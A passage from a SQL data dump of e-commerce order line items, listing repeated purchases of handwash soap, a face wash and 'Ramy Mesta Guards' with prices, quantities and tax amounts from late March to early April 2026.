(265, 777, '2026-03-29 20:35:42', '2026-03-29 20:35:42', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(266, 778, '2026-03-29 20:35:47', '2026-03-29 20:35:47', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(267, 779, '2026-03-29 20:35:52', '2026-03-29 20:35:52', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(268, 780, '2026-03-29 20:35:57', '2026-03-29 20:35:57', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(269, 781, '2026-03-29 21:25:16', '2026-03-29 21:25:16', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(270, 794, '2026-03-29 21:25:21', '2026-03-29 21:25:21', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(271, 795, '2026-03-29 21:25:27', '2026-03-29 21:25:27', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(272, 796, '2026-03-29 21:25:32', '2026-03-29 21:25:32', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(273, 797, '2026-03-29 21:25:36', '2026-03-29 21:25:36', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(274, 798, '2026-03-29 21:25:41', '2026-03-29 21:25:41', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(275, 800, '2026-03-30 01:09:34', '2026-03-30 01:09:34', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(276, 801, '2026-03-30 06:42:50', '2026-03-30 06:42:50', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(277, 803, '2026-03-30 09:42:58', '2026-03-30 09:43:18', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 5.0000, 422.0000, 422.0000, NULL, 20.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, 2110.0000, 2110.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 2110.0000, 2110.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(278, 804, '2026-03-30 12:37:23', '2026-03-30 12:37:23', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(279, 806, '2026-03-30 18:31:48', '2026-03-30 18:31:48', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(280, 808, '2026-03-31 00:14:18', '2026-03-31 00:14:18', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(281, 809, '2026-03-31 06:01:51', '2026-03-31 06:01:51', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(282, 811, '2026-03-31 12:05:35', '2026-03-31 12:05:35', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(283, 813, '2026-03-31 18:10:17', '2026-03-31 18:10:17', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(284, 814, '2026-03-31 18:28:59', '2026-03-31 18:28:59', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(285, 827, '2026-03-31 18:29:04', '2026-03-31 18:29:04', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(286, 828, '2026-03-31 18:29:09', '2026-03-31 18:29:09', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(287, 829, '2026-03-31 18:29:14', '2026-03-31 18:29:14', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(288, 830, '2026-03-31 18:29:20', '2026-03-31 18:29:20', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(289, 831, '2026-03-31 18:29:25', '2026-03-31 18:29:25', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(290, 835, '2026-04-01 00:03:20', '2026-04-01 00:03:20', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(291, 836, '2026-04-01 06:05:48', '2026-04-01 06:05:48', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(292, 839, '2026-04-01 12:36:57', '2026-04-01 12:36:57', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(293, 840, '2026-04-01 12:55:27', '2026-04-01 12:55:27', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(294, 853, '2026-04-01 12:55:32', '2026-04-01 12:55:32', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(295, 854, '2026-04-01 12:55:37', '2026-04-01 12:55:37', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(296, 855, '2026-04-01 12:55:43', '2026-04-01 12:55:43', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(297, 856, '2026-04-01 12:55:48', '2026-04-01 12:55:48', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(298, 857, '2026-04-01 12:55:53', '2026-04-01 12:55:53', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(299, 858, '2026-04-01 14:26:30', '2026-04-01 14:26:49', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 12.0000, 422.0000, 422.0000, NULL, 20.0000, 1012.8000, 1012.8000, 0.0000, 0.0000, 0.0000, 5064.0000, 5064.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 5064.0000, 5064.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(300, 861, '2026-04-01 18:50:59', '2026-04-01 18:50:59', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(301, 863, '2026-04-02 00:53:12', '2026-04-02 00:53:12', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(302, 864, '2026-04-02 01:02:03', '2026-04-02 01:02:22', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 12.0000, 422.0000, 422.0000, NULL, 20.0000, 1012.8000, 1012.8000, 0.0000, 0.0000, 0.0000, 5064.0000, 5064.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 5064.0000, 5064.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(303, 866, '2026-04-02 07:06:35', '2026-04-02 07:06:35', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(304, 868, '2026-04-02 13:31:23', '2026-04-02 13:31:23', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(305, 870, '2026-04-02 19:56:20', '2026-04-02 19:56:20', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(306, 872, '2026-04-03 01:49:21', '2026-04-03 01:49:21', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(307, 874, '2026-04-03 07:49:06', '2026-04-03 07:49:06', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(308, 876, '2026-04-03 13:59:52', '2026-04-03 13:59:52', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(309, 878, '2026-04-03 17:33:29', '2026-04-03 17:33:49', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 12.0000, 422.0000, 422.0000, NULL, 20.0000, 1012.8000, 1012.8000, 0.0000, 0.0000, 0.0000, 5064.0000, 5064.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 5064.0000, 5064.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(310, 879, '2026-04-03 20:05:58', '2026-04-03 20:05:58', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(311, 883, '2026-04-04 02:23:38', '2026-04-04 02:23:38', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(312, 884, '2026-04-04 04:05:48', '2026-04-04 04:06:06', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 12.0000, 422.0000, 422.0000, NULL, 20.0000, 1012.8000, 1012.8000, 0.0000, 0.0000, 0.0000, 5064.0000, 5064.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 5064.0000, 5064.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(313, 886, '2026-04-04 05:49:12', '2026-04-04 05:49:12', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(314, 887, '2026-04-04 08:27:02', '2026-04-04 08:27:02', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(315, 893, '2026-04-04 15:29:27', '2026-04-04 15:29:27', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(316, 894, '2026-04-04 16:06:02', '2026-04-04 16:06:02', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
